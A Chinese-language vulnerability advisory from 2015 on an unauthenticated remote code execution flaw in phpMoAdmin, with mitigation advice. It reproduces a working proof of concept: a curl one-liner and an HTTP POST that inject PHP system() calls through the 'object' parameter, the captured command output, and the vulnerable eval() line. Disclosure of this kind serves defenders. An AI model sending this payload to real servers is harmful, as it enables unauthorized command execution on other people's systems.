PHPMoAdmin未授权远程代码执行漏洞
发表日期:2015-03-17 09:41:57
PHPMoAdmin未授权远程代码执行漏洞
发布日期:2015-03-04
更新日期:2015-03-05
受影响系统:
PHPMoAdmin PHPMoAdmin
详细信息:
MongoDB是开源的NoSQL数据库。phpMoAdmin是一个免费、开源、以PHP为基础、基于AJAX的MongoDBGUI管理工具,管理者可轻松管理NoSQL数据库。
phpMoAdmin在实现上存在远程代码执行漏洞,未授权远程用户可利用此漏洞劫持使用phpMoAdmin工具的网站。
来源:
sp1nlock
参考信息:
http://www.exploit-db.com/exploits/36251/
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!######################################################################
# _ ___ _ _ ____ ____ _ _____
# | | / _ \\| \\ | |/ ___|/ ___| / \\|_ _|
# | | | | | | \\| | | _| | / _ \\ | |
# | |__| |_| | |\\ | |_| | |___ / ___ \\| |
# |_____\\___/|_| \\_|\\____|\\____/_/ \\_\\_|
#
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates : March 3, 2015
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################
[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a
stripped-down version of the Vork high-performance framework.
[+] Exploit
============================================================
Someone was trying to sale this shit for 3000usd lolz
$ curl "http://path.to/moadmin.php" -d "object=1;system(\'id\');exit"
[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7
POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
object=1;system(\'id;ls -lha\');exit
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 16:57:40 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 223
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 116K
drwxr-xr-x 1 longcat longcat 102 Mar 3 16:55 .
drwxr-xr-x 6 root root 4.0K Mar 3 16:17 ..
-rw-rw-r-- 1 longcat longcat 112K Mar 3 16:55 moadmin.php
[+] Vulnerability Analysis
============================================================
Filename: moadmin.php
1. create new moadminComponent object
1977: $mo = new moadminComponent;
2. if the http-post parameter \'object\' is set
738: class moadminComponent {
...
762: public function __construct() {
...
786: if (isset($_POST[\'object\'])) {
787: if (self::$model->saveObject($_GET[\'collection\'],
$_POST[\'object\'])) {
...
3. evaluate the value of \'object\' as PHP code
692: public function saveObject($collection, $obj) {
693: eval(\'$obj=\' . $obj . \';\'); //cast from string to array
解决办法:
临时解决方法:
建议您采取以下措施以降低威胁:
* 在开发者发布修复补丁之前,MongoDB用户暂时不要使用phpMoAdmin工具。
* 或者暂时使用其他免费MongoDB GUI工具,例如:
RockMongo
MongoVUE
Mongo-Express
UMongo
Genghis
* 或者使用分布式配置密码(htaccess password)限制未经授权的访问moadmin.php文件。
厂商补丁:
PHPMoAdmin
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.phpmoadmin.com/